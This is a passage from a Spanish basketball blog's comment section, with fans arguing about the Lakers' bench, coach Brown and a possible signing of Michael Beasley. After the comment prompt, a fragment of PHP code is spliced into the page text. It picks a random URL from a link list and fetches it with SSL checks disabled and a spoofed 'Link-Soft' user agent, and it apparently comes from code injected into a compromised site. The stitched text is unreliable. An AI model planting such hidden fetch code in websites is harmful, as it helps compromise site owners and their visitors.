    De momento como nota positiva, el rendimiento de Sacre, al que le falta mucho por mejorar pero al menos no es tan nulo como parecia en su noche del draft.

      Citar

  39. nba dice:
    #39

    Venga Brown que veo que se quiere marcar un pleno de derrotas, tendria sentido si jugasen los suplentes, pero teniendo en cuenta que apenas cuenta con ellos, tiene mala pinta la regular como haya algun contratiempo de los titulares, y luego se tirara de los pelos de la cabeza.

      Citar

  40. Jabho dice:
    #40

    Todos los años leo que el banquillo de los lakers por fin tiene gente para aportar… todos los años lo leo y no lo veo. El problema no es el banquillo, es el entrenador que es muuuuy malo. Indigno del nivel del equipo.

    Aspirantes al titulo, pero no por delante de Thunder o Heat. La plenitud física es importante y si bien creo que Kobe no bajara mucho, si hay que ver como aguanta la espalda de Nash. El es la gran mejora sobre el año pasado, porque Howard es mejor que Bynum pero no es como pasar de Foster a Howard por ejemplo….

    Si resuelven la cuestión de química tendrán mucho ganado. Si ya echan a Brown y consiguen un entrenador decente serán máximos favoritos….

    Ala mucha presion… yo creo que no lo consiguen.

      Citar

  41. Esteban dice:
    #41

    Michael Beasley cortado por lo SUNS, posibilidad inigualable àra los lakers para traer otro talentoso jugador a costo bajo por un año,

    es un riesgo, pero yo lo correria, quiza de alghuna manera puiedan hacerlo sentir comodo, y esto puede dar sus frutos

    farmar, young y beasley el dan decididamente otra cara al banco de los lakers, que asi podrian aspirar a cosas importantes

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>